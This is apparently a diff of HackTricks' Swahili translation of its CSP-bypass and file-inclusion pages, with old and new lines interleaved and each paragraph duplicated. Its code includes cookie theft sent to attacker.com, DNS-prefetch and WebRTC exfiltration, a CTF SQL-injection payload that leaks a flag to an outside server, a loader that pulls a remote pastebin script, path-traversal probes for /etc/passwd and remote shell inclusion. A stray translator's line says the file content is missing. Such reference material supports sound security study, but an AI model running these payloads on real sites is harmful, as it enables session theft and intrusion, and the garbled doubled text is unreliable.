Kwa redirection hii, hata kama path imeelezewa kikamilifu, bado itapitishwa.
Therefore, the best solution is to ensure that the website does not have any open redirect vulnerabilities and that there are no domains that can be exploited in the CSP rules.
Kwa hiyo, suluhisho bora ni kuhakikisha kwamba tovuti haina open redirect vulnerabilities na kwamba hakuna domains zinazoweza kutumika vibaya katika sheria za CSP.
### Bypass CSP with dangling markup
### Bypass CSP kwa dangling markup
Soma [hapa](../dangling-markup-html-scriptless-injection/index.html).
Soma [jinsi hapa](../dangling-markup-html-scriptless-injection/index.html).
### 'unsafe-inline'; img-src \*; via XSS
```
default-src 'self' 'unsafe-inline'; img-src *;
```
`'unsafe-inline'` inamaanisha kwamba unaweza kutekeleza script yoyote ndani ya code (XSS inaweza kutekeleza code) na `img-src *` inamaanisha kwamba unaweza kutumia kwenye webpage picha yoyote kutoka kwa rasilimali yoyote.
`'unsafe-inline'` ina maana kwamba unaweza kutekeleza script yoyote ndani ya code (XSS inaweza kutekeleza code) na `img-src *` ina maana kwamba unaweza kutumia kwenye ukurasa wa wavuti picha yoyote kutoka kwa rasilimali yoyote.
Unaweza bypass CSP hii kwa exfiltrating data kupitia picha (katika tukio hili XSS inatumia CSRF ambapo ukurasa unaopatikana na bot una SQLi, na extract flag kupitia picha):
Unaweza bypass CSP hii kwa exfiltrating data kupitia picha (katika tukio hili XSS inatumia CSRF ambapo ukurasa unaopatikana na bot una SQLi, na kutoa flag kupitia picha):
```javascript
<script>
fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new
Image().src='http://PLAYER_SERVER/?'+_)
</script>
```
Chanzo: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
Unaweza pia kutumia vibaya usanidi huu ili **kupakia javascript code iliyowekwa ndani ya picha**. Kwa mfano, ikiwa ukurasa unaruhusu kupakua picha kutoka Twitter. Unaweza **unda** **picha maalum**, **pakia** kwenye Twitter na kutumia "**unsafe-inline**" ku**tekeleza** JS code (kama XSS ya kawaida) ambayo itapakia **picha**, **itoa** **JS** kutoka ndani yake na **kuitekeleza** **hiyo**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
Unaweza pia kutumia mbiu hii kuweza **load javascript code inserted inside an image**. Kwa mfano, ikiwa ukurasa unaruhusu kupakia picha kutoka Twitter. Unaweza **craft** **special image**, **upload** yake kwenye Twitter na kutumia "**unsafe-inline**" ili **execute** JS code (kama XSS ya kawaida) ambayo itaunda **load** ya **image**, **extract** **JS** kutoka ndani yake na kui**execute**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
### Kwa Service Workers
Service workers **`importScripts`** function haizuiwi na CSP:
Service Workers `importScripts` function haijawekewa kikomo na CSP:
{{#ref}}
@ -469,25 +469,25 @@ Service workers **`importScripts`** function haizuiwi na CSP:
#### Chrome
Ikiwa **parameter** uliyotuma inakwekwa ndani ya **declaration** ya **policy,** basi unaweza **badilisha** **policy** kwa namna yoyote itakayoi**fanya isiwe na maana**. Unaweza **kuruhusu script 'unsafe-inline'** kwa mojawapo ya njia hizi za bypass:
Ikiwa **parameter** uliotumwa na wewe ime **pasted inside** ya **declaration** ya **policy,** basi unaweza **alter** **policy** kwa namna itakayoiweka **it useless**. Unaweza **allow script 'unsafe-inline'** kwa mojawapo ya hizi bypasses:
```bash
script-src-elem *; script-src-attr *
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
```
Kwa sababu directive hii itafunika **script-src directives zilizopo**.\
You can find an example here: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
Kwa sababu directive hii itabadilisha script-src directives zilizopo.\
Unaweza kupata mfano hapa: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
#### Edge
Kwenye Edge ni rahisi zaidi. Kama unaweza kuongeza katika CSP tu hii: **`;_`**, Edge itaondoa kabisa **policy**.\
Katika Edge ni rahisi zaidi. Ikiwa unaweza kuongeza kwenye CSP tu hivi: **`;_`** **Edge** itaiondoa sera nzima.\
Example: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](<http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E>)
### img-src \*; via XSS (iframe) - Time attack
Tambua kutokuwepo kwa directive `'unsafe-inline'`\
Mara hii unaweza kumfanya mwathirika **kupakia** ukurasa ulioko chini ya **udhibiti wako** kupitia **XSS** kwa kutumia `<iframe`. Mara hii utamfanya mwathirika afikie ukurasa kutoka ambako unataka kutoa taarifa (**CSRF**). Huwezi kupata yaliyomo ya ukurasa, lakini kama kwa namna fulani unaweza **kudhibiti muda ukurasa unavyohitaji kupakia** unaweza kutoa taarifa unazohitaji.
Notice the lack of the directive `'unsafe-inline'`\
This time you can make the victim **load** a page in **your control** via **XSS** with a `<iframe`. This time you are going to make the victim access the page from where you want to extract information (**CSRF**). You cannot access the content of the page, but if somehow you can **control the time the page needs to load** you can extract the information you need.
Mara hii **flag** itatolewa; kila wakati **char inapokisiwa kwa usahihi** kupitia SQLi, **response** inachukua **muda zaidi** kutokana na sleep function. Kisha, utaweza kutoa flag:
Mara hii **flag** itatolewa, kila wakati **char imegadiriwa kwa usahihi** kupitia SQLi **response** inachukua **muda mrefu** kutokana na sleep function. Kisha, utaweza kutoa flag:
```html
<!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
<iframe name="f" id="g"></iframe> // The bot will load an URL with the payload
@ -549,22 +549,22 @@ run()
```
### Kupitia Bookmarklets
Shambulio hili linahitaji aina ya social engineering ambapo mshambulizi **anamhakikishia mtumiaji kuburuta na kuachia kiungo juu ya bookmarklet ya kivinjari**. Bookmarklet hii itakuwa na msimbo wa **javascript wenye madhara** ambao unapoburuta na kuachishwa au kubonyezwa unatekelezwa katika muktadha wa dirisha la wavuti la sasa, **kupita kando ya CSP na kuruhusu kuiba taarifa nyeti** kama cookies au tokens.
Shambulio hili lingehusisha baadhi ya social engineering ambapo mshambuliaji **convinces the user to drag and drop a link over the bookmarklet of the browser**. Bookmarklet hii ingekuwa na **malicious javascript** code ambayo, wakati ya drag\&dropped or clicked, ingeteuliwa katika muktadha wa dirisha la wavuti la sasa, **bypassing CSP and allowing to steal sensitive information** kama cookies au tokens.
Kwa maelezo zaidi [**angalia ripoti ya asili hapa**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).
For more information [**check the original report here**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).
### Kupita kando ya CSP kwa kuweka CSP kali
### CSP bypass by restricting CSP
Katika [**this CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP inapitia kando kwa kuingiza ndani ya iframe iliyoruhusiwa CSP kali zaidi ambayo ilinzuia kupakia faili maalum ya JS ambayo, kisha, kupitia **prototype pollution** au **dom clobbering** iliruhusu **kutumia script tofauti ili kupakia script yoyote**.
In [**this CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP imevunjwa kwa kuingiza ndani ya iframe iliyokubaliwa CSP kali zaidi ambayo ilizuia kupakia faili maalum ya JS ambayo, kisha, kupitia **prototype pollution** au **dom clobbering** iliwezesha **abuse a different script to load an arbitrary script**.
Unaweza **kuzuia CSP ya Iframe** kwa kutumia attribute **`csp`**:
Unaweza **restrict a CSP of an Iframe** with the **`csp`** attribute:
```html
<iframe
src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]"
csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe>
```
Katika [**this CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), ilikuwa inawezekana kupitia **HTML injection** kuifanya **CSP** kuwa na vikwazo zaidi kiasi kwamba script iliyokuwa ikizuia **CSTI** ilizimwa na kwa hivyo **vulnerability became exploitable.**\
CSP inaweza kufanywa kuwa kali zaidi kwa kutumia **HTML meta tags** na **inline scripts** zinaweza kuzimwa kwa **kuondoa** **entry** inayoruhusu **nonce** yao na **enable specific inline script via sha**:
Katika [**this CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), ilikuwa inawezekana kupitia **HTML injection** **restrict** zaidi **CSP**, hivyo script iliyokuwa ikizuia CSTI ilizimwa na kwa hiyo **vulnerability became exploitable.**\
CSP inaweza kufanywa kuwa kali zaidi kwa kutumia **HTML meta tags** na inline scripts zinaweza kuzimwa kwa **removing** ile **entry** inayoruhusu **nonce** zao na **enable specific inline script via sha**:
```html
<meta
http-equiv="Content-Security-Policy"
@ -575,55 +575,55 @@ content="script-src 'self'
```
### JS exfiltration with Content-Security-Policy-Report-Only
Iwapo unaweza kusababisha server kuituma header **`Content-Security-Policy-Report-Only`** yenye **thamani unayodhibiti** (labda kwa sababu ya CRLF), unaweza kuielekeza kwa server yako na ikiwa **utaweka** **JS content** unayotaka ku-exfiltrate ndani ya **`<script>`**, na kwa kuwa kuna uwezekano mkubwa `unsafe-inline` hauruhusiwi na CSP, hii itasababisha **CSP error** na sehemu ya script (iliyomo taarifa nyeti) itatumwa kwa server kupitia `Content-Security-Policy-Report-Only`.
Ikiwa unaweza kufanikisha server kujibu na header **`Content-Security-Policy-Report-Only`** yenye **thamani inayodhibitiwa na wewe** (labda kwa sababu ya CRLF), unaweza kuifanya iielekeze kwa server yako, na ukifunga (wrap) **JS content** unayotaka ku-exfiltrate ndani ya **`<script>`**, na kwa kuwa kuna uwezekano mkubwa `unsafe-inline` haikubaliwi na CSP, hii itasababisha **CSP error** na sehemu ya script (inayoeleza taarifa nyeti) itatumwa kwa server kupitia `Content-Security-Policy-Report-Only`.
Kwa mfano [**angalia hii CTF writeup**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).
Kwa mfano [**check this CTF writeup**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).
### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
```javascript
document.querySelector("DIV").innerHTML =
'<iframe src=\'javascript:var s = document.createElement("script");s.src = "https://pastebin.com/raw/dw5cWGK6";document.body.appendChild(s);\'></iframe>'
```
### Leaking Taarifa na CSP na Iframe
### Leaking Information with CSP and Iframe
- Kuna `iframe` inayoundwa inayoelekeza kwa URL (tuitaje `https://example.redirect.com`) ambayo inaruhusiwa na CSP.
- URL hii inapindaisha hadi URL ya siri (kwa mfano `https://usersecret.example2.com`) ambayo **haikiruhusiwi** na CSP.
- Kwa kusikiliza tukio la `securitypolicyviolation`, mtu anaweza kunasa property ya `blockedURI`. Property hii inaonyesha domain ya blocked URI, leaking the secret domain to which the initial URL redirected.
- An `iframe` inaundwa inayobofya kwenye URL (tuseme `https://example.redirect.com`) ambayo imekuruhusiwa na CSP.
- URL hii kisha redirects kwenda kwenye URL ya siri (mfano, `https://usersecret.example2.com`) ambayo **haijaruhusiwa** na CSP.
- Kwa kusikiliza tukio la `securitypolicyviolation`, mtu anaweza kunasa property ya `blockedURI`. Property hii inaonyesha domain ya URI iliyozuiliwa, ikileak domain ya siri ambayo URL ya awali ilielekezwa.
Inavutia kutambua kwamba browsers kama Chrome na Firefox zina tabia tofauti katika kushughulikia iframes kwa kuzingatia CSP, jambo linaloweza kusababisha leakage ya taarifa nyeti kutokana na undefined behavior.
Inavutia kutambua kuwa browsers kama Chrome na Firefox zina tabia tofauti katika kushughulikia `iframe` kuhusiana na CSP, jambo ambalo linaweza kusababisha leak ya taarifa nyeti kutokana na undefined behavior.
Mbinu nyingine inahusisha exploiting the CSP yenyewe kubaini secret subdomain. Mbinu hii inategemea binary search algorithm na kurekebisha CSP ili kujumuisha specific domains ambazo zinalengwa kupigwa block kwa makusudi. Kwa mfano, ikiwa secret subdomain imejengwa kwa herufi zisizojulikana, unaweza kwa kurudia kujaribu subdomains tofauti kwa kubadilisha CSP directive ili ku-block au kuweka allow subdomains hizi. Hapa kuna snippet inayoonyesha jinsi CSP inaweza kuwekwa ili kuwezesha method hii:
Mbinu nyingine inajumuisha kutumia CSP yenyewe ili kugundua subdomain ya siri. Njia hii inategemea binary search algorithm na kurekebisha CSP ili kujumuisha domains maalum ambazo zinazuiliwa kwa makusudi. Kwa mfano, ikiwa subdomain ya siri ina tabaka za herufi zisizojulikana, unaweza kufanya majaribio kwa kurudia kwa subdomains tofauti kwa kubadilisha CSP directive ili kuzizuia au kuziruhusu subdomains hizi. Hapa kuna snippet inayoonyesha jinsi CSP inaweza kuwekwa kusaidia mbinu hii:
```markdown
img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
```
Kwa kufuatilia maombi yanayozuiliwa au kuruhusiwa na CSP, mtu anaweza kupunguza herufi zinazowezekana katika subdomain ya siri, hatimaye kubaini URL kamili.
Kwa kufuatilia maombi ambayo CSP inazuia au kuruhusu, mtu anaweza kupunguza herufi zinazowezekana katika subdomain ya siri, na hatimaye kugundua URL kamili.
Mbinu zote mbili zinatumia utofauti mdogo wa utekelezaji wa CSP na tabia katika vivinjari, zikionyesha jinsi sera zinazojionyesha kuwa salama zinaweza kusababisha leak ya taarifa nyeti bila kukusudia.
Njia zote mbili zinatumia undani wa utekelezaji wa CSP na tabia katika browsers, zikionesha jinsi sera zinavyoonekana salama zinaweza bila kukusudia leak taarifa nyeti.
Trick from [**here**](https://ctftime.org/writeup/29310).
Mbinu kutoka [**here**](https://ctftime.org/writeup/29310).
## Teknolojia Hatari za Kuepuka CSP
## Teknolojia hatarishi za ku-bypass CSP
### Makosa ya PHP wakati kuna params nyingi sana
### PHP Errors when too many params
Kulingana na the [**last technique commented in this video**](https://www.youtube.com/watch?v=Sm4G6cAHjWM), kutuma vigezo vingi mno (1001 GET parameters ingawa pia unaweza kufanya hivyo kwa POST params na faili zaidi ya 20). Kila **`header()`** iliyobainishwa katika PHP web code **haitatumwa** kutokana na kosa ambalo hili litasababisha.
Kulingana na [**last technique commented in this video**](https://www.youtube.com/watch?v=Sm4G6cAHjWM), kutuma vigezo vingi (1001 GET parameters ingawa pia unaweza kufanya hivyo kwa POST params na faili zaidi ya 20). Kila **`header()`** iliyofafanuliwa kwenye code ya PHP ya web **haitatumwa** kutokana na kosa ambalo hilo litasababisha.
### PHP response buffer overload
PHP inajulikana kwa buffering the response to 4096 bytes kwa default. Kwa hiyo, ikiwa PHP inaonyesha warning, kwa kutoa data ya kutosha ndani ya warnings, the response itatumwa kabla ya CSP header, causing the header to be ignored.\
Then, the technique consists basically in filling the response buffer with warnings so the CSP header isn't sent.
PHP inajulikana kwa **ku-buffering the response to 4096** bytes kwa default. Kwa hivyo, ikiwa PHP inaonyesha warning, kwa kutoa **enough data inside warnings**, the **response** itatumwa **before** the **CSP header**, causing the header to be ignored.\
Kisha, mbinu inahusisha kwa msingi **kujaza the response buffer with warnings** ili CSP header isitumwe.
Idea from [**this writeup**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).
Wazo kutoka [**this writeup**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).
### Kill CSP via max_input_vars (headers already sent)
Kwa kuwa headers lazima zitumwe kabla ya output yoyote, warnings emitted by PHP zinaweza kuharibu au kufanya zisifanye kazi mwito za `header()` zinazofuata. Ikiwa user input itazidi `max_input_vars`, PHP itatoa startup warning kwanza; any subsequent `header('Content-Security-Policy: ...')` itashindwa na “headers already sent”, ikifanya CSP izimike kwa ufanisi na kuruhusu reflective XSS ambayo vinginevyo ingezuiliwa.
Kwa sababu headers lazima zitumwe kabla ya output yoyote, warnings zinazotolewa na PHP zinaweza kuharibu wito za baadaye za `header()`. Ikiwa input ya mtumiaji itazidi `max_input_vars`, PHP itatoa startup warning kwanza; `header('Content-Security-Policy: ...')` yoyote baada yake itashindwa na “headers already sent”, kwa ufanisi kuzima CSP na kuruhusu XSS reflektifu ambayo vinginevyo ingekuwa imesitishwa.
```php
<?php
header("Content-Security-Policy: default-src 'none';");
echo $_GET['xss'];
```
Sina maudhui ya faili. Tafadhali weka hapa yaliyomo ya src/pentesting-web/content-security-policy-csp-bypass/README.md ili niweze kuyatafsiri.
Mfano:
```bash
# CSP in place → payload blocked by browser
curl -i "http://orange.local/?xss=<svg/onload=alert(1)>"
@ -633,9 +633,9 @@ curl -i "http://orange.local/?xss=<svg/onload=alert(1)>&A=1&A=2&...&A=1000"
# Warning: PHP Request Startup: Input variables exceeded 1000 ...
# Warning: Cannot modify header information - headers already sent
```
### Andika Upya Ukurasa la Kosa
### Kuandika Upya Ukurasa wa Makosa
Kutokana na [**this writeup**](https://blog.ssrf.kr/69) inaonekana kuwa ilikuwa inawezekana ku-bypass ulinzi wa CSP kwa kupakia ukurasa la kosa (huenda bila CSP) na kuandika upya yaliyomo yake.
Kutoka kwa [**this writeup**](https://blog.ssrf.kr/69) inaonekana kuwa ilikuwa inawezekana kuvuka ulinzi wa CSP kwa kupakia ukurasa wa makosa (inawezekana bila CSP) na kuandika upya yaliyomo yake.
```javascript
a = window.open("/" + "x".repeat(4100))
setTimeout(function () {
@ -644,40 +644,40 @@ a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0le
```
### SOME + 'self' + wordpress
SOME ni mbinu inayofanya matumizi mabaya ya XSS (au XSS iliyopunguzwa sana) **in an endpoint of a page** ili **kuabusu** **endpoints nyingine za same origin.** Hii hufanywa kwa kupakia endpoint yenye udhaifu kutoka ukurasa wa mshambuliaji kisha kusasisha (refresh) ukurasa wa mshambuliaji hadi endpoint halisi ndani ya origin sawa unayotaka kuabusu. Kwa njia hii **endpoint yenye udhaifu** inaweza kutumia object ya **`opener`** katika **payload** ili **kupata DOM** ya **endpoint halisi ili kuabusu.** Kwa taarifa zaidi angalia:
SOME ni mbinu inayotumia XSS (au XSS iliyopunguzwa sana) **in an endpoint of a page** ili **abuse** **other endpoints of the same origin.** Hii inafanywa kwa kupakia vulnerable endpoint kutoka kwenye attacker page kisha ku-refresh attacker page hadi real endpoint katika same origin unayotaka kuabuse. Kwa njia hii **vulnerable endpoint** inaweza kutumia object ya **`opener`** katika **payload** ili **access the DOM** ya **real endpoint to abuse**. Kwa maelezo zaidi angalia:
{{#ref}}
../xss-cross-site-scripting/some-same-origin-method-execution.md
{{#endref}}
Zaidi ya hayo, **wordpress** ina endpoint ya **JSONP** katika `/wp-json/wp/v2/users/1?_jsonp=data` ambayo ita**reflect** the **data** iliyotumwa katika output (kwa kikomo cha herufi, nambari na nukta tu).
Zaidi ya hayo, **wordpress** ina **JSONP** endpoint katika `/wp-json/wp/v2/users/1?_jsonp=data` ambayo ita **reflect** the **data** iliyotumwa kwenye output (kwa kikomo cha herufi, namba na nukta pekee).
Mshambuliaji anaweza kutumia endpoint hiyo kuunda SOME attack dhidi ya WordPress na kuiingiza ndani ya `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` kumbuka kwamba **script** hii ita**loaded** kwa sababu ime **allowed by 'self'**. Zaidi ya hayo, na kwa sababu WordPress imewekwa, mshambuliaji anaweza kutumia **SOME attack** kupitia **vulnerable** **callback** endpoint ambayo **bypasses the CSP** ili kumpa mtumiaji vibali zaidi, kusanisha plugin mpya...\
Kwa taarifa zaidi kuhusu jinsi ya kufanya shambulio hili angalia [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
Mshambuliaji anaweza kuabuse endpoint hiyo ili **generate a SOME attack** dhidi ya WordPress na **embed** ndani ya `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` kumbuka kwamba hii **script** ita **loaded** kwa sababu ime **allowed by 'self'**. Zaidi ya hayo, na kwa kuwa WordPress imewekwa, mshambuliaji anaweza kuabuse **SOME attack** kupitia **vulnerable** **callback** endpoint ambayo **bypasses the CSP** ili kumpa mtumiaji haki zaidi, kusanisha plugin mpya...\
Kwa maelezo zaidi kuhusu jinsi ya kufanya shambulio hili angalia [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
## CSP Exfiltration Bypasses
Kama kuna CSP kali ambayo haitakuacha kuwasiliana na server za nje, kuna mambo kadhaa unaweza kufanya kila wakati ili kuondoa taarifa.
Kama kuna CSP kali ambayo haikuruhusu **interact with external servers**, bado kuna baadhi ya njia ambazo unaweza kutumia ku-exfiltrate taarifa.
### Location
Unaweza kubadilisha tu location ili kutuma kwa server ya mshambuliaji taarifa za siri:
Unaweza tu kusasisha location ili kutuma kwa server ya mshambuliaji taarifa zilizofichwa:
```javascript
var sessionid = document.cookie.split("=")[1] + "."
document.location = "https://attacker.com/?" + sessionid
```
### Meta tag
Unaweza kufanya redirect kwa kuingiza meta tag (hii ni redirect tu; hii haitasababisha leak ya maudhui)
Unaweza kufanya redirect kwa kuingiza meta tag (hii ni redirect tu, hii haitaleak maudhui)
```html
<meta http-equiv="refresh" content="1; http://attacker.com" />
```
### DNS Prefetch
Ili kupakia kurasa kwa haraka, vivinjari hutatua awali majina ya mwenyeji (hostnames) kuwa anwani za IP na kuyahifadhi kwenye cache kwa matumizi baadaye.\\
Unaweza kumuonyesha kivinjari kutatua awali jina la mwenyeji kwa: `<link rel="dns-prefetch" href="something.com">`
Ili kupakia kurasa kwa haraka, vivinjari zitapata mapema kutatua majina ya mwenyeji kuwa anwani za IP na kuzihifadhi kwenye kache kwa matumizi baadaye.\
Unaweza kumwelekeza kivinjari kutatua jina la mwenyeji mapema kwa kutumia: `<link rel="dns-prefetch" href="something.com">`
Unaweza kutumia vibaya tabia hii ili **exfiltrate sensitive information via DNS requests**:
Unaweza kutumia tabia hii vibaya ili **exfiltrate sensitive information via DNS requests**:
```javascript
var sessionid = document.cookie.split("=")[1] + "."
var body = document.getElementsByTagName("body")[0]
@ -694,18 +694,18 @@ linkEl.rel = "prefetch"
linkEl.href = urlWithYourPreciousData
document.head.appendChild(linkEl)
```
Ili kuzuia hili kutokee, seva inaweza kutuma HTTP header:
Ili kuzuia hili lisitokee, seva inaweza kutuma HTTP header:
```
X-DNS-Prefetch-Control: off
```
> [!TIP]
> Inaonekana mbinu hii haifanyi kazi kwenye headless browsers (bots)
> Inaonekana, mbinu hii haitumiki katika headless browsers (bots)
### WebRTC
Kwenye kurasa kadhaa unaweza kusoma kwamba **WebRTC haiangalii sera ya `connect-src` ya CSP**.
Kwenye kurasa kadhaa unaweza kusoma kwamba **WebRTC haitakagui sera ya `connect-src` ya CSP**.
Kwa kweli unaweza _leak_ taarifa kwa kutumia _DNS request_. Angalia code hii:
Kwa kweli unaweza _leak_ taarifa kwa kutumia _ombi la DNS_. Angalia msimbo huu:
```javascript
;(async () => {
p = new RTCPeerConnection({ iceServers: [{ urls: "stun:LEAK.dnsbin" }] })
@ -713,7 +713,7 @@ p.createDataChannel("")
p.setLocalDescription(await p.createOffer())
})()
```
Chaguo jingine:
Chaguo lingine:
```javascript
var pc = new RTCPeerConnection({
"iceServers":[
@ -727,7 +727,7 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
```
### CredentialsContainer
Credential popup hutuma ombi la DNS kwenda iconURL bila kuzuiliwa na ukurasa. Inafanya kazi tu katika muktadha salama (HTTPS) au kwenye localhost.
Popup ya credentials ituma ombi la DNS kwa iconURL bila kuzuiwa na ukurasa. Inafanya kazi tu katika muktadha salama (HTTPS) au kwenye localhost.
```javascript
navigator.credentials.store(
new FederatedCredential({
@ -743,7 +743,7 @@ iconURL:"https:"+your_data+"example.com"
- [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
- [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
## Kuunda CSP Kiotomatiki
## Kuunda CSP kwa Kiotomatiki
[https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)

324
src/pentesting-web/file-inclusion/README.md
View File

@ -4,14 +4,14 @@
## File Inclusion
**Remote File Inclusion (RFI):** Faili inapakiwa kutoka kwenye server ya mbali (Bora: Unaweza kuandika msimbo na server itauitekeleza). In php hii ime **zimwa** kwa default (**allow_url_include**).\
**Remote File Inclusion (RFI):** Faili inasomwa kutoka kwa server ya mbali (Bora: Unaweza kuandika msimbo na server itauitekeleza). Katika php hii ni **imezimwa** kwa default (**allow_url_include**).\
**Local File Inclusion (LFI):** Server inapakia faili ya ndani.
Udhaifu hutokea wakati mtumiaji anaweza kudhibiti kwa namna fulani faili itakayopakiwa na server.
Udhaifu hutokea wakati mtumiaji anaweza kwa njia fulani kudhibiti faili itakayopakiwa na server.
Funksioni za **PHP** zilizo hatarini: require, require_once, include, include_once
Zilizo hatarini **PHP functions**: require, require_once, include, include_once
Zana ya kuvutia ya kutumia ku-exploit udhaifu huu: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
Chombo kizuri cha ku-exploit udhaifu huu: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
## Blind - Interesting - LFI2RCE files
```python
@ -19,17 +19,17 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
```
### **Linux**
**Kwa kuchanganya orodha kadhaa za \*nix LFI na kuongeza njia zaidi, nimeunda hii:**
**Nimechanganya orodha kadhaa za \*nix LFI na kuongeza njia zaidi, nimeunda hii:**
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
{{#endref}}
Jaribu pia kubadilisha `/` kwa `\`\
Jaribu pia kuongeza `../../../../../`
Pia jaribu kubadilisha `/` kwa `\`\
Pia jaribu kuongeza `../../../../../`
Orodha inayotumia mbinu mbalimbali kupata faili /etc/password (kuangalia ikiwa udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
Orodha inayotumia mbinu mbalimbali kupata faili /etc/password (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
### **Windows**
@ -40,22 +40,22 @@ Muungano wa wordlists tofauti:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
{{#endref}}
Jaribu pia kubadilisha `/` kwa `\`\
Jaribu pia kuondoa `C:/` na kuongeza `../../../../../`
Pia jaribu kubadilisha `/` kwa `\`\
Pia jaribu kuondoa `C:/` na kuongeza `../../../../../`
Orodha inayotumia mbinu mbalimbali kupata faili /boot.ini (kuangalia ikiwa udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
Orodha inayotumia mbinu mbalimbali kupata faili /boot.ini (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
### **OS X**
Angalia orodha ya LFI ya linux.
Kagua orodha ya LFI ya linux.
## Msingi wa LFI na njia za kukwepa
## Misingi ya LFI na bypasses
Mifano yote ni kwa Local File Inclusion lakini inaweza kutumika pia kwa Remote File Inclusion (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)//>).
Mifano yote ni kwa Local File Inclusion lakini pia inaweza kutumika kwa Remote File Inclusion (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)/>).
```
http://example.com/index.php?page=../../../etc/passwd
```
### Mfululizo wa traversal uliokatwa bila rekursia
### traversal sequences zilizokatwa bila kurudi kwa msururu
```python
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
@ -63,15 +63,15 @@ http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
```
### **Null byte (%00)**
Bypass kuongezwa kwa viongezi mwishoni mwa string iliyotolewa (bypass of: $\_GET\['param']."php")
Bypass kuongezwa kwa chars mwishoni mwa string iliyotolewa (bypass of: $\_GET\['param']."php")
```
http://example.com/index.php?page=../../../etc/passwd%00
```
Hii ime **tatuliwa tangu PHP 5.4**
Hii **imetatuliwa tangu PHP 5.4**
### **Encoding**
### **Kodishaji**
